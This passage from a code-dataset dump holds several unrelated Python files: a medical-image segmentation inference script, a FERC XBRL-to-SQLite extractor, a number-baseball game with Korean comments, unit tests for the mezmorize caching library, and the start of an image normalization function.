re_sampler.SetOutputPixelType(src_itk.GetPixelID())\n re_sampler.SetReferenceImage(src_itk)\n re_sampler.SetSize(re_sample_size)\n re_sampler.SetOutputSpacing(output_spacing)\n re_sampler.SetInterpolator(eval('sitk.sitk' + interpolate_method))\n return re_sampler.Execute(src_itk)\n\n\ndef resample_image_to_ref(image, ref, interp=sitk.sitkNearestNeighbor, pad_value=0):\n resample = sitk.ResampleImageFilter()\n resample.SetReferenceImage(ref)\n resample.SetDefaultPixelValue(pad_value)\n resample.SetInterpolator(interp)\n return resample.Execute(image)\n\n\ndef task(rawf):\n arr_raw, sitk_raw = _get_arr(rawf)\n origin_spacing = sitk_raw.GetSpacing()\n rai_size = sitk_raw.GetSize()\n print(rai_size)\n\n if get_do_separate_z(origin_spacing) or get_do_separate_z(current_spacing[::-1]):\n print('preprocessing: do seperate z.....')\n img_arr = []\n for i in range(rai_size[-1]):\n img_arr.append(sitk.GetArrayFromImage(itk_change_spacing(sitk_raw[:, :, i], current_spacing[::-1][:-1])))\n img_arr = np.array(img_arr)\n img_sitk = sitk.GetImageFromArray(img_arr)\n img_sitk.SetOrigin(sitk_raw.GetOrigin())\n img_sitk.SetDirection(sitk_raw.GetDirection())\n img_sitk.SetSpacing(tuple(current_spacing[::-1][:-1]) + (origin_spacing[-1],))\n img_arr = sitk.GetArrayFromImage(\n itk_change_spacing(img_sitk, current_spacing[::-1], interpolate_method='NearestNeighbor'))\n else:\n img_arr = sitk.GetArrayFromImage(itk_change_spacing(sitk_raw, current_spacing[::-1]))\n print(img_arr.shape)\n pad_flag = 0\n padzyx = np.clip(np.array(patch_size) - np.array(img_arr.shape), 0, 1000)\n if np.any(padzyx > 0):\n pad_flag = 1\n pad_left = padzyx // 2\n pad_right = padzyx - padzyx // 2\n img_arr = np.pad(img_arr,\n ((pad_left[0], pad_right[0]), (pad_left[1], pad_right[1]), (pad_left[2], pad_right[2])))\n\n prob_map = predict(img_arr)\n\n if pad_flag:\n prob_map = prob_map[:, :,\n pad_left[0]: img_arr.shape[0] - pad_right[0],\n pad_left[1]: img_arr.shape[1] - pad_right[1],\n pad_left[2]: img_arr.shape[2] - pad_right[2]]\n del img_arr\n\n '''\n FYI, In order to smooth the organ edge, is there any better choice ?\n '''\n\n if get_do_separate_z(origin_spacing) or get_do_separate_z(current_spacing[::-1]):\n print('postpreprocessing: do seperate z......')\n prob_map_interp_xy = torch.zeros(\n list(prob_map.size()[:2]) + [prob_map.size()[2], ] + list(sitk_raw.GetSize()[::-1][1:]), dtype=torch.half)\n\n for i in range(prob_map.size(2)):\n prob_map_interp_xy[:, :, i] = F.interpolate(prob_map[:, :, i].cuda().float(),\n size=sitk_raw.GetSize()[::-1][1:],\n mode=\"bilinear\").detach().half().cpu()\n del prob_map\n\n prob_map_interp = np.zeros(list(prob_map_interp_xy.size()[:2]) + list(sitk_raw.GetSize()[::-1]),\n dtype=np.float16)\n\n for i in range(prob_map_interp.shape[1]):\n prob_map_interp[:, i] = F.interpolate(prob_map_interp_xy[:, i:i + 1].cuda().float(),\n size=sitk_raw.GetSize()[::-1],\n mode=\"nearest\").detach().half().cpu().numpy()\n del prob_map_interp_xy\n\n else:\n prob_map_interp = np.zeros(list(prob_map.size()[:2]) + list(sitk_raw.GetSize()[::-1]), dtype=np.float16)\n\n for i in range(prob_map.size(1)):\n prob_map_interp[:, i] = F.interpolate(prob_map[:, i:i + 1].cuda().float(),\n size=sitk_raw.GetSize()[::-1],\n mode=\"trilinear\").detach().half().cpu().numpy()\n del prob_map\n\n segmentation = np.argmax(prob_map_interp.squeeze(0), axis=0)\n del prob_map_interp\n pred_sitk = sitk.GetImageFromArray(segmentation.astype(np.uint8))\n pred_sitk.CopyInformation(sitk_raw)\n pred_sitk = resample_image_to_ref(pred_sitk, sitk_raw)\n sitk.WriteImage(pred_sitk, rawf.replace(\".nii.gz\", \"_nnUNet_pred.nii.gz\"))\n\n\nrawf = \"/home/SENSETIME/luoxiangde.vendor/Projects/ABDSeg/data/ABDSeg/data/imagesTs/ABD_0016.nii.gz\"\ntask(rawf)\n","sub_path":"Inference3D.py","file_name":"Inference3D.py","file_ext":"py","file_size_in_byte":11855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"564527844","text":"\"\"\"Generic extractor for all FERC XBRL data.\"\"\"\nimport io\nimport json\nfrom datetime import date, datetime\nfrom pathlib import Path\n\nimport sqlalchemy as sa\nfrom dagster import Field, Noneable, op\nfrom ferc_xbrl_extractor import xbrl\nfrom ferc_xbrl_extractor.instance import InstanceBuilder\n\nimport pudl\nfrom pudl.helpers import EnvVar\nfrom pudl.settings import FercGenericXbrlToSqliteSettings, XbrlFormNumber\nfrom pudl.workspace.datastore import Datastore\n\nlogger = pudl.logging_helpers.get_logger(__name__)\n\n\nclass FercXbrlDatastore:\n \"\"\"Simple datastore wrapper for accessing ferc1 xbrl resources.\"\"\"\n\n def __init__(self, datastore: Datastore):\n \"\"\"Instantiate datastore wrapper for ferc1 resources.\"\"\"\n self.datastore = datastore\n\n def get_taxonomy(self, year: int, form: XbrlFormNumber) -> tuple[io.BytesIO, str]:\n \"\"\"Returns the path to the taxonomy entry point within the an archive.\"\"\"\n raw_archive = self.datastore.get_unique_resource(\n f\"ferc{form.value}\", year=year, data_format=\"xbrl\"\n )\n\n # Construct path to taxonomy entry point within archive\n taxonomy_date = date(year, 1, 1).isoformat()\n taxonomy_entry_point = f\"taxonomy/form{form.value}/{taxonomy_date}/form/form{form.value}/form-{form.value}_{taxonomy_date}.xsd\"\n\n return io.BytesIO(raw_archive), taxonomy_entry_point\n\n def get_filings(self, year: int, form: XbrlFormNumber) -> list[InstanceBuilder]:\n \"\"\"Return list of filings from archive.\"\"\"\n archive = self.datastore.get_zipfile_resource(\n f\"ferc{form.value}\", year=year, data_format=\"xbrl\"\n )\n\n # Load RSS feed metadata\n filings = []\n with archive.open(\"rssfeed\") as f:\n metadata = json.load(f)\n\n # Loop through all filings by a given filer in a given quarter\n # And take the most recent one\n for key, filing_info in metadata.items():\n latest = datetime.min\n for filing_id, info in filing_info.items():\n # Parse date from 9-tuple\n published = datetime.fromisoformat(info[\"published_parsed\"])\n\n if published > latest:\n latest = published\n latest_filing = filing_id\n\n # Create in memory buffers with file data to be used in conversion\n filings.append(\n InstanceBuilder(\n io.BytesIO(archive.open(f\"{latest_filing}.xbrl\").read()),\n latest_filing,\n )\n )\n\n return filings\n\n\ndef _get_sqlite_engine(\n form_number: int, output_path: Path, clobber: bool\n) -> sa.engine.Engine:\n \"\"\"Create SQLite engine for specified form and drop tables.\n\n Args:\n form_number: FERC form number.\n output_path: path to PUDL outputs.\n clobber: Flag indicating whether or not to drop tables.\n \"\"\"\n # Read in the structure of the DB, if it exists\n logger.info(\n f\"Dropping the old FERC Form {form_number} XBRL derived SQLite DB if it exists.\"\n )\n db_path = output_path / f\"ferc{form_number}_xbrl.sqlite\"\n\n logger.info(f\"Connecting to SQLite at {db_path}...\")\n sqlite_engine = sa.create_engine(f\"sqlite:///{db_path}\")\n logger.info(f\"Connected to SQLite at {db_path}!\")\n try:\n # So that we can wipe it out\n pudl.helpers.drop_tables(sqlite_engine, clobber=clobber)\n except sa.exc.OperationalError:\n pass\n\n return sqlite_engine\n\n\n@op(\n config_schema={\n \"pudl_output_path\": Field(\n EnvVar(\n env_var=\"PUDL_OUTPUT\",\n ),\n description=\"Path of directory to store the database in.\",\n default_value=None,\n ),\n \"clobber\": Field(\n bool, description=\"Clobber existing ferc1 database.\", default_value=False\n ),\n \"workers\": Field(\n Noneable(int),\n description=\"Specify number of worker processes for parsing XBRL filings.\",\n default_value=None,\n ),\n \"batch_size\": Field(\n int,\n description=\"Specify number of XBRL instances to be processed at a time (defaults to 50)\",\n default_value=50,\n ),\n },\n required_resource_keys={\"ferc_to_sqlite_settings\", \"datastore\"},\n)\ndef xbrl2sqlite(context) -> None:\n \"\"\"Clone the FERC Form 1 XBRL Databsae to SQLite.\"\"\"\n output_path = Path(context.op_config[\"pudl_output_path\"])\n clobber = context.op_config[\"clobber\"]\n batch_size = context.op_config[\"batch_size\"]\n workers = context.op_config[\"workers\"]\n ferc_to_sqlite_settings = context.resources.ferc_to_sqlite_settings\n datastore = datastore = context.resources.datastore\n datastore = FercXbrlDatastore(datastore)\n\n # Loop through all other forms and perform conversion\n for form in XbrlFormNumber:\n # Get desired settings object\n settings = ferc_to_sqlite_settings.get_xbrl_dataset_settings(form)\n\n # If no settings for form in question, skip\n if settings is None:\n continue\n\n if settings.disabled:\n logger.info(f\"Dataset ferc{form}_xbrl is disabled, skipping\")\n continue\n\n sqlite_engine = _get_sqlite_engine(form.value, output_path, clobber)\n\n convert_form(\n settings,\n form,\n datastore,\n sqlite_engine,\n output_path=output_path,\n batch_size=batch_size,\n workers=workers,\n )\n\n\ndef convert_form(\n form_settings: FercGenericXbrlToSqliteSettings,\n form: XbrlFormNumber,\n datastore: FercXbrlDatastore,\n sqlite_engine: sa.engine.Engine,\n output_path: Path,\n batch_size: int | None = None,\n workers: int | None = None,\n) -> None:\n \"\"\"Clone a single FERC XBRL form to SQLite.\n\n Args:\n form_settings: Validated settings for converting the desired XBRL form to SQLite.\n form: FERC form number.\n datastore: Instance of a FERC XBRL datastore for retrieving data.\n sqlite_engine: SQLAlchemy connection to mirrored database.\n pudl_settings: Dictionary containing paths and database URLs\n used by PUDL.\n batch_size: Number of XBRL filings to process in a single CPU process.\n workers: Number of CPU processes to create for processing XBRL filings.\n\n Returns:\n None\n \"\"\"\n datapackage_path = str(output_path / f\"ferc{form.value}_xbrl_datapackage.json\")\n metadata_path = str(output_path / f\"ferc{form.value}_xbrl_taxonomy_metadata.json\")\n # Process XBRL filings for each year requested\n for year in form_settings.years:\n raw_archive, taxonomy_entry_point = datastore.get_taxonomy(year, form)\n xbrl.extract(\n datastore.get_filings(year, form),\n sqlite_engine,\n raw_archive,\n form.value,\n batch_size=batch_size,\n workers=workers,\n datapackage_path=datapackage_path,\n metadata_path=metadata_path,\n archive_file_path=taxonomy_entry_point,\n )\n","sub_path":"src/pudl/extract/xbrl.py","file_name":"xbrl.py","file_ext":"py","file_size_in_byte":7158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"215781274","text":"import random\nimport os\n\nnumbers = []\nnumber = str(random.randint(0, 9))\n\nfor i in range(3):\n while number in numbers:\n number = str(random.randint(0, 9))\n numbers.append(number)\n# for문을 사용해 3번 반복한다.\n# while문을 사용해 numbers배열안에 number수가 있는지 체크하고 동일한 숫자가 있다면 number에 새로운 숫자를 넣어준다. number의 새로운 값이 기존 값과 동일할 경우 while문은 깨지지 않고 numbers안에 없는 수가 나올때까지 while문이 실행된다.\n# while문이 깨지면 numbers배열에 append(number)로 새로운 숫자가 추가된다.\n\nos.system(\"cls\")\n\nprint(\"*\" * 60)\nprint(\"야구게임을 시작합니다!\")\nprint(\"*\" * 60)\n\ncountStrike = 0\ncountBall = 0\n# 변수설정\n\nwhile countStrike < 3:\n countStrike = 0\n countBall = 0\n# 변수를 다시 초기화해서 값을 유추할수 있도록한다.\n\n num = str(input(\"숫자 3자리를 입력하세요> \"))\n if len(num) == 3:\n for i in range(0, 3):\n for j in range(0, 3):\n if num[i] == numbers[j] and i == j:\n countStrike += 1\n elif num[i] == numbers[j] and i != j:\n countBall += 1\n# for문을 두번 사용하여 사용자가 입력한 3자리의 숫자를 기존 배열인 numbers의 숫자와 비교한다.\n# 값이 같고 자리도 같으면 스트라이크+1, 값이 같고 자리값이 다르면 볼+1\n\n if countStrike == 0 and countBall == 0:\n print(\"3 Out!\")\n else:\n output = \"\"\n if countStrike > 0:\n output += \"{} Strike\" .format(countStrike)\n if countBall > 0:\n output += \" {} Ball\" .format(countBall)\n\n print(output.strip())\n# 결과값을 출력하기 위해 if문을 사용하여 스트라이크와 볼값이 모두 0일 경우 3아웃, 그외 else문 앞에서 각각 if문을 발동하여 output변수에 스트라이크와 볼값을 더해 출력한다. 이때 output.strip()을 사용하여 불필요한 공백을 삭제해서 출력한다.\n\n# 스트라이크 값이 3이하일때만 while문이 발동되어 반복됨으로 numbers[]배열과 num값이 일치할경우 while문은 깨지고 죄종 \"Mission Completed!\"문이 출력된다.\n\n\nprint(\"Mission Completed!\")","sub_path":"python/02_숫자야구게임/baseballgame.py","file_name":"baseballgame.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"467695763","text":"# -*- coding: utf-8 -*-\n# vim: sw=4:ts=4:expandtab\n\"\"\"\n tests.test_cache\n ~~~~~~~~~~~~~~~~\n\n Provides unit tests.\n\"\"\"\nimport time\nimport random\n\nimport nose.tools as nt\n\nfrom mezmorize import Cache, function_namespace\nfrom mezmorize.utils import HAS_MEMCACHE, HAS_REDIS, get_cache_config\n\nfrom mezmorize.backends import (\n SimpleCache, FileSystemCache, RedisCache, MemcachedCache,\n SASLMemcachedCache, SpreadSASLMemcachedCache, AVAIL_MEMCACHES)\n\nBIGINT = 2 ** 21\nBIGGERINT = 2 ** 28\n\n\ndef setup_func(*args, **kwargs):\n namespace = kwargs.pop('namespace', None)\n client_name = kwargs.pop('client_name', None)\n\n if client_name:\n CACHE_OPTIONS = kwargs.get('CACHE_OPTIONS', {})\n CACHE_OPTIONS['preferred_memcache'] = client_name\n kwargs['CACHE_OPTIONS'] = CACHE_OPTIONS\n\n config = get_cache_config(*args, **kwargs)\n cache = Cache(namespace=namespace, **config)\n return cache\n\n\ndef check_cache_type(cache, cache_type):\n nt.assert_equal(cache.config['CACHE_TYPE'], cache_type)\n\n\ndef check_cache_instance(cache, cache_instance):\n nt.assert_is_instance(cache.cache, cache_instance)\n\n\ndef check_client_name(cache, expected):\n nt.assert_equal(cache.cache.client_name, expected)\n\n\ndef check_too_big(cache, times, error=None):\n if cache.cache.TooBig:\n with nt.assert_raises(error or cache.cache.TooBig):\n cache.set('big', 'a' * times)\n\n nt.assert_is_none(cache.get('big'))\n else:\n cache.set('big', 'a' * times)\n nt.assert_equal(cache.get('big'), 'a' * times)\n\n\ndef check_set_delete(cache, key, value, multiplier=None):\n if multiplier:\n value *= multiplier\n\n cache.set(key, value)\n nt.assert_equal(cache.get(key), value)\n\n cache.delete(key)\n nt.assert_is_none(cache.get(key))\n\n\nclass TestCache(object):\n def setup(self):\n self.cache = setup_func('simple')\n\n def teardown(self):\n self.cache.clear()\n\n def test_dict_config(self):\n check_cache_type(self.cache, 'simple')\n check_cache_instance(self.cache, SimpleCache)\n\n def test_000_set(self):\n self.cache.set('hi', 'hello')\n nt.assert_equal(self.cache.get('hi'), 'hello')\n\n def test_add(self):\n self.cache.add('hi', 'hello')\n nt.assert_equal(self.cache.get('hi'), 'hello')\n\n self.cache.add('hi', 'foobar')\n nt.assert_equal(self.cache.get('hi'), 'hello')\n\n def test_add_unicode(self):\n self.cache.add('ȟį', 'ƕɛĺłö')\n nt.assert_equal(self.cache.get('ȟį'), 'ƕɛĺłö')\n\n self.cache.add('ȟį', 'fööƀåř')\n nt.assert_equal(self.cache.get('ȟį'), 'ƕɛĺłö')\n\n def test_add_bytes(self):\n self.cache.add(b'hi', b'hello')\n nt.assert_equal(self.cache.get(b'hi'), b'hello')\n\n self.cache.add(b'hi', b'foobar')\n nt.assert_equal(self.cache.get(b'hi'), b'hello')\n\n def test_delete(self):\n check_set_delete(self.cache, 'hi', 'hello')\n\n def test_delete_unicode(self):\n check_set_delete(self.cache, 'ȟį', 'ƕɛĺłö')\n\n def test_delete_bytes(self):\n check_set_delete(self.cache, b'hi', b'foobar')\n\n def test_memoize(self):\n @self.cache.memoize(5)\n def func(a, b):\n return a + b + random.randrange(0, 100000)\n\n result = func(5, 2)\n time.sleep(1)\n nt.assert_equal(func(5, 2), result)\n\n result2 = func(5, 3)\n nt.assert_not_equal(result2, result)\n\n time.sleep(6)\n nt.assert_not_equal(func(5, 2), result)\n\n time.sleep(1)\n nt.assert_not_equal(func(5, 3), result2)\n\n def test_timeout(self):\n config = get_cache_config('simple', CACHE_DEFAULT_TIMEOUT=1)\n self.cache = Cache(**config)\n\n @self.cache.memoize(50)\n def func(a, b):\n return a + b + random.randrange(0, 100000)\n\n result = func(5, 2)\n time.sleep(2)\n nt.assert_equal(func(5, 2), result)\n\n def test_delete_timeout(self):\n @self.cache.memoize(5)\n def func(a, b):\n return a + b + random.randrange(0, 100000)\n\n result = func(5, 2)\n result2 = func(5, 3)\n time.sleep(1)\n\n nt.assert_equal(func(5, 2), result)\n nt.assert_equal(func(5, 2), result)\n nt.assert_not_equal(func(5, 3), result)\n nt.assert_equal(func(5, 3), result2)\n\n self.cache.delete_memoized(func)\n nt.assert_not_equal(func(5, 2), result)\n nt.assert_not_equal(func(5, 3), result2)\n\n def test_delete_verhash(self):\n @self.cache.memoize(5)\n def func(a, b):\n return a + b + random.randrange(0, 100000)\n\n result = func(5, 2)\n result2 = func(5, 3)\n time.sleep(1)\n\n nt.assert_equal(func(5, 2), result)\n nt.assert_equal(func(5, 2), result)\n nt.assert_not_equal(func(5, 3), result)\n nt.assert_equal(func(5, 3), result2)\n\n fname = function_namespace(func)[0]\n version_key = self.cache._memvname(fname)\n nt.assert_is_not_none(self.cache.get(version_key))\n\n self.cache.delete_memoized_verhash(func)\n nt.assert_is_none(self.cache.get(version_key))\n nt.assert_not_equal(func(5, 2), result)\n nt.assert_not_equal(func(5, 3), result2)\n nt.assert_is_not_none(self.cache.get(version_key))\n\n def test_delete_rand(self):\n @self.cache.memoize()\n def func(a, b):\n return a + b + random.randrange(0, 100000)\n\n result_a = func(5, 1)\n result_b = func(5, 2)\n nt.assert_equal(func(5, 1), result_a)\n nt.assert_equal(func(5, 2), result_b)\n\n self.cache.delete_memoized(func, 5, 2)\n nt.assert_equal(func(5, 1), result_a)\n nt.assert_not_equal(func(5, 2), result_b)\n\n def test_args(self):\n @self.cache.memoize()\n def func(a, b):\n return sum(a) + sum(b) + random.randrange(0, 100000)\n\n result_a = func([5, 3, 2], [1])\n result_b = func([3, 3], [3, 1])\n nt.assert_equal(func([5, 3, 2], [1]), result_a)\n nt.assert_equal(func([3, 3], [3, 1]), result_b)\n\n self.cache.delete_memoized(func, [5, 3, 2], [1])\n nt.assert_not_equal(func([5, 3, 2], [1]), result_a)\n nt.assert_equal(func([3, 3], [3, 1]), result_b)\n\n def test_kwargs(self):\n @self.cache.memoize()\n def func(a, b=None):\n return a + sum(b.values()) + random.randrange(0, 100000)\n\n result_a = func(1, {'one': 1, 'two': 2})\n result_b = func(5, {'three': 3, 'four': 4})\n nt.assert_equal(func(1, {'one': 1, 'two': 2}), result_a)\n nt.assert_equal(func(5, {'three': 3, 'four': 4}), result_b)\n\n self.cache.delete_memoized(func, 1, {'one': 1, 'two': 2})\n nt.assert_not_equal(func(1, {'one': 1, 'two': 2}), result_a)\n nt.assert_equal(func(5, {'three': 3, 'four': 4}), result_b)\n\n def test_kwargonly(self):\n @self.cache.memoize()\n def func(a=None):\n if a is None:\n a = 0\n return a + random.random()\n\n result_a = func()\n result_b = func(5)\n\n nt.assert_equal(func(), result_a)\n nt.assert_less(func(), 1)\n nt.assert_equal(func(5), result_b)\n nt.assert_greater_equal(func(5), 5)\n nt.assert_less(func(5), 6)\n\n def test_arg_kwarg(self):\n @self.cache.memoize()\n def func(a, b, c=1):\n return a + b + c + random.randrange(0, 100000)\n\n nt.assert_equal(func(1, 2), func(1, 2, c=1))\n nt.assert_equal(func(1, 2), func(1, 2, 1))\n nt.assert_equal(func(1, 2), func(1, 2))\n nt.assert_not_equal(func(1, 2, 3), func(1, 2))\n\n with nt.assert_raises(TypeError):\n func(1)\n\n def test_classarg(self):\n @self.cache.memoize()\n def func(a):\n return a.value + random.random()\n\n class Adder(object):\n def __init__(self, value):\n self.value = value\n\n adder = Adder(15)\n adder2 = Adder(20)\n\n y = func(adder)\n z = func(adder2)\n nt.assert_not_equal(y, z)\n nt.assert_equal(func(adder), y)\n nt.assert_not_equal(func(adder), z)\n\n adder.value = 14\n nt.assert_equal(func(adder), y)\n nt.assert_not_equal(func(adder), z)\n nt.assert_not_equal(func(adder), func(adder2))\n nt.assert_equal(func(adder2), z)\n\n def test_classfunc(self):\n class Adder(object):\n def __init__(self, initial):\n self.initial = initial\n\n @self.cache.memoize()\n def add(self, b):\n return self.initial + b\n\n adder1 = Adder(1)\n adder2 = Adder(2)\n\n x = adder1.add(3)\n nt.assert_equal(adder1.add(3), x)\n nt.assert_not_equal(adder1.add(4), x)\n nt.assert_not_equal(adder1.add(3), adder2.add(3))\n\n def test_delete_classfunc(self):\n class Adder(object):\n def __init__(self, initial):\n self.initial = initial\n\n @self.cache.memoize()\n def add(self, b):\n return self.initial + b + random.random()\n\n adder1 = Adder(1)\n adder2 = Adder(2)\n\n a1 = adder1.add(3)\n a2 = adder2.add(3)\n nt.assert_not_equal(a1, a2)\n nt.assert_equal(adder1.add(3), a1)\n nt.assert_equal(adder2.add(3), a2)\n\n self.cache.delete_memoized(adder1.add)\n a3 = adder1.add(3)\n a4 = adder2.add(3)\n\n nt.assert_not_equal(a1, a3)\n nt.assert_not_equal(a1, a3)\n nt.assert_equal(a2, a4)\n\n self.cache.delete_memoized(Adder.add)\n a5 = adder1.add(3)\n a6 = adder2.add(3)\n\n nt.assert_not_equal(a5, a6)\n nt.assert_not_equal(a3, a5)\n nt.assert_not_equal(a4, a6)\n\n def test_delete_classmethod(self):\n class Mock(object):\n @classmethod\n @self.cache.memoize(5)\n def func(cls, a, b):\n return a + b + random.randrange(0, 100000)\n\n result = Mock.func(5, 2)\n result2 = Mock.func(5, 3)\n time.sleep(1)\n\n nt.assert_equal(Mock.func(5, 2), result)\n nt.assert_equal(Mock.func(5, 2), result)\n nt.assert_not_equal(Mock.func(5, 3), result)\n nt.assert_equal(Mock.func(5, 3), result2)\n\n self.cache.delete_memoized(Mock.func)\n nt.assert_not_equal(Mock.func(5, 2), result)\n nt.assert_not_equal(Mock.func(5, 3), result2)\n\n def test_multiple_arg_kwarg_calls(self):\n @self.cache.memoize()\n def func(a, b, c=[1, 1], d=[1, 1]):\n rand = random.randrange(0, 100000)\n return sum(a) + sum(b) + sum(c) + sum(d) + rand\n\n expected = func([5, 3, 2], [1], c=[3, 3], d=[3, 3])\n nt.assert_equal(func([5, 3, 2], [1], d=[3, 3], c=[3, 3]), expected)\n\n result = func(b=[1], a=[5, 3, 2], c=[3, 3], d=[3, 3])\n nt.assert_equal(result, expected)\n nt.assert_equal(func([5, 3, 2], [1], [3, 3], [3, 3]), expected)\n\n def test_delete_multiple_arg_kwarg(self):\n @self.cache.memoize()\n def func(a, b, c=[1, 1], d=[1, 1]):\n rand = random.randrange(0, 100000)\n return sum(a) + sum(b) + sum(c) + sum(d) + rand\n\n result_a = func([5, 3, 2], [1], c=[3, 3], d=[3, 3])\n self.cache.delete_memoized(func, [5, 3, 2], [1], [3, 3], [3, 3])\n result_b = func([5, 3, 2], [1], c=[3, 3], d=[3, 3])\n nt.assert_not_equal(result_a, result_b)\n\n self.cache.delete_memoized(\n func, [5, 3, 2], b=[1], c=[3, 3], d=[3, 3])\n result_b = func([5, 3, 2], [1], c=[3, 3], d=[3, 3])\n nt.assert_not_equal(result_a, result_b)\n\n self.cache.delete_memoized(func, [5, 3, 2], [1], c=[3, 3], d=[3, 3])\n result_a = func([5, 3, 2], [1], c=[3, 3], d=[3, 3])\n nt.assert_not_equal(result_a, result_b)\n\n self.cache.delete_memoized(\n func, [5, 3, 2], b=[1], c=[3, 3], d=[3, 3])\n result_a = func([5, 3, 2], [1], c=[3, 3], d=[3, 3])\n nt.assert_not_equal(result_a, result_b)\n\n self.cache.delete_memoized(func, [5, 3, 2], [1], c=[3, 3], d=[3, 3])\n result_b = func([5, 3, 2], [1], c=[3, 3], d=[3, 3])\n nt.assert_not_equal(result_a, result_b)\n\n self.cache.delete_memoized(func, [5, 3, 2], [1], [3, 3], [3, 3])\n result_a = func([5, 3, 2], [1], c=[3, 3], d=[3, 3])\n nt.assert_not_equal(result_a, result_b)\n\n def test_kwargs_to_args(self):\n def func(a, b, c=None, d=None):\n return sum(a) + sum(b) + random.randrange(0, 100000)\n\n expected = (1, 2, 'foo', 'bar')\n\n args = self.cache._gen_args(func, 1, 2, 'foo', 'bar')\n nt.assert_equal(tuple(args), expected)\n\n args = self.cache._gen_args(func, 2, 'foo', 'bar', a=1)\n nt.assert_equal(tuple(args), expected)\n\n args = self.cache._gen_args(func, a=1, b=2, c='foo', d='bar')\n nt.assert_equal(tuple(args), expected)\n\n args = self.cache._gen_args(func, d='bar', b=2, a=1, c='foo')\n nt.assert_equal(tuple(args), expected)\n\n args = self.cache._gen_args(func, 1, 2, d='bar', c='foo')\n nt.assert_equal(tuple(args), expected)\n\n\nclass TestNSCache(object):\n def setup(self):\n self.namespace = 'https://github.com/reubano/mezmorize'\n self.cache = setup_func('simple', namespace=self.namespace)\n\n def teardown(self):\n self.cache.clear()\n\n def test_memoize(self):\n def func(a, b):\n return a + b + random.randrange(0, 100000)\n\n config = get_cache_config('simple')\n cache = Cache(namespace=self.namespace, **config)\n cache_key1 = self.cache._memoize_make_cache_key()(func)\n cache_key2 = cache._memoize_make_cache_key()(func)\n nt.assert_equal(cache_key1, cache_key2)\n\n\nclass TestFileSystemCache(TestCache):\n def setup(self):\n self.cache = setup_func('filesystem', CACHE_DIR='/tmp')\n\n def teardown(self):\n self.cache.clear()\n\n def test_dict_config(self):\n check_cache_type(self.cache, 'filesystem')\n check_cache_instance(self.cache, FileSystemCache)\n\n def test_add_bytes(self):\n self.cache.add(b'hi', 'hello')\n nt.assert_equal(self.cache.get(b'hi'), 'hello')\n\n self.cache.add(b'hi', b'foobar')\n nt.assert_equal(self.cache.get(b'hi'), 'hello')\n\n\nif HAS_MEMCACHE:\n class TestMemcachedCache(TestCache):\n def setup(self, client_name=None):\n self.cache = setup_func('memcached', client_name=client_name)\n\n def teardown(self):\n self.cache.clear()\n\n def test_dict_config(self):\n for client_name in AVAIL_MEMCACHES:\n self.setup(client_name=client_name)\n yield check_cache_type, self.cache, 'memcached'\n yield check_cache_instance, self.cache, MemcachedCache\n yield check_client_name, self.cache, client_name\n self.teardown()\n\n def test_mc_large_value(self):\n for client_name in AVAIL_MEMCACHES:\n self.setup(client_name=client_name)\n yield check_too_big, self.cache, BIGGERINT\n self.teardown()\n\nelse:\n print('TestMemcachedCache requires Memcache')\n\nif HAS_MEMCACHE:\n class TestSASLMemcachedCache(TestCache):\n def setup(self, client_name=None):\n self.cache = setup_func('saslmemcached', client_name=client_name)\n\n def teardown(self):\n self.cache.clear()\n\n def test_dict_config(self):\n for client_name in AVAIL_MEMCACHES:\n self.setup(client_name=client_name)\n yield check_cache_type, self.cache, 'saslmemcached'\n yield check_cache_instance, self.cache, SASLMemcachedCache\n self.teardown()\n\n def test_mc_large_value(self):\n for client_name in AVAIL_MEMCACHES:\n self.setup(client_name=client_name)\n yield check_too_big, self.cache, BIGGERINT\n self.teardown()\n\nelse:\n print('TestSASLMemcachedCache requires Memcache')\n\nif HAS_MEMCACHE:\n class TestSpreadSASLMemcachedCache(TestCache):\n def setup(self, client_name=None):\n cache_type = 'spreadsaslmemcached'\n self.cache = setup_func(cache_type, client_name=client_name)\n\n def teardown(self):\n self.cache.clear()\n\n def test_dict_config(self):\n for client_name in AVAIL_MEMCACHES:\n self.setup(client_name=client_name)\n cache_instance = SpreadSASLMemcachedCache\n yield check_cache_type, self.cache, 'spreadsaslmemcached'\n yield check_cache_instance, self.cache, cache_instance\n self.teardown()\n\n def test_mc_large_value(self):\n for client_name in AVAIL_MEMCACHES:\n self.setup(client_name=client_name)\n yield check_set_delete, self.cache, 'big', 'a', BIGINT\n yield check_set_delete, self.cache, 'ƅıɠ', 'ą', BIGINT\n yield check_set_delete, self.cache, b'big', b'a', BIGINT\n yield check_too_big, self.cache, BIGGERINT, ValueError\n self.teardown()\nelse:\n print('TestSpreadSASLMemcachedCache requires Memcache')\n\nif HAS_REDIS:\n class TestRedisCache(TestCache):\n def setup(self, db=0):\n self.cache = setup_func('redis', db=db)\n self.client = self.cache.cache._client\n\n def teardown(self):\n self.cache.clear()\n\n def test_dict_config(self):\n check_cache_type(self.cache, 'redis')\n check_cache_instance(self.cache, RedisCache)\n\n def test_add_bytes(self):\n pass\n\n def test_delete_bytes(self):\n pass\n\n def test_redis_url_default_db(self):\n rconn = self.client.connection_pool.get_connection('foo')\n nt.assert_equal(rconn.db, 0)\n\n def test_redis_url_custom_db(self):\n self.setup(db=2)\n rconn = self.client.connection_pool.get_connection('foo')\n nt.assert_equal(rconn.db, 2)\nelse:\n print('TestRedisCache requires Redis')\n\nif __name__ == '__main__':\n nt.main()\n","sub_path":"tests/test_cache.py","file_name":"test_cache.py","file_ext":"py","file_size_in_byte":18158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"190760891","text":"import numpy as np\nimport os\nimport torch\nimport torch.utils.data as data_utils\nimport torchvision\nimport torchvision.transforms as transforms\nfrom PIL import Image\n\ndef normalize(image, target=None):\n \"\"\"Normalizing function we got from the cedars-sinai medical center\"\"\"\n if target is None:\n target = np.array([[148.60, 41.56], [169.30, 9.01], [105.97, 6.67]])\n\n M, N = image.shape[:2]\n\n whitemask = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n whitemask = whitemask > 215 ## TODO: Hard code threshold; replace with Otsu\n\n imagelab = cv2.cvtColor(image, cv2.COLOR_RGB2LAB)\n\n imageL, imageA, imageB = cv2.split(imagelab)\n\n # mask is valid when true\n imageLM = np.ma.MaskedArray(imageL, whitemask)\n imageAM = 